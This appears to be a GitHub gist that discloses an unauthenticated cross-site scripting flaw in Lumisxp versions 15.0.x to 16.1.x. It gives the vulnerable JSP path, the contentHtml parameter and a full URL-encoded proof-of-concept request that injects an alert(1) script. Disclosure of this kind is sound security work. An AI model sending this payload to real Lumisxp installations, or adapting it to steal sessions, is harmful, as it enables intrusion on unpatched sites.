Skip to content

Instantly share code, notes, and snippets.

@rodnt

rodnt/xss2-lumisxp.md

Last active June 12, 2024 15:02
Show Gist options
  • Save rodnt/c53d4c95bb6966f0a2cf381ae5089c79 to your computer and use it in GitHub Desktop.
Save rodnt/c53d4c95bb6966f0a2cf381ae5089c79 to your computer and use it in GitHub Desktop.
Download ZIP
Unauthenticated XSS Lumisxp 15.0.x <= 16.1.x UrlAccessibilityEvaluation.jsp
Raw
xss2-lumisxp.md

Description

Lumisxp versions 15.0.x to 16.1.x have an unauthenticated XSS vulnerability in the UrlAccessibilityEvaluation.jsp page, specifically in the contentHtml parameter.

Request

  • Payload:

    GET /lumis/service/htmlevaluation/UrlAccessibilityEvaluation.jsp?contentHtml=%3cp%3e%3ci%20id%3d%22run-code-button%22%20lang%3d%22xml%22%20title%3d%22Run%20Code%20and%20See%20Output%22%3e%3c%2fi%3e%3c%2fp%3e%0a%0a%3cp%3e%3ci%20title%3d%22Light%20Mode%22%3e%3c%2fi%3e%3c%2fp%3e%0a%0a%3ctable%20border%3d%220%22%20cellpadding%3d%220%22%20cellspacing%3d%220mmdfn%26lt%3bscript%26gt%3balert(1)%26lt%3b%2fscript%26gt

  • Request:

    Request Image

  • Response:

    Response Image

Author: Rodolfo Tavares

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment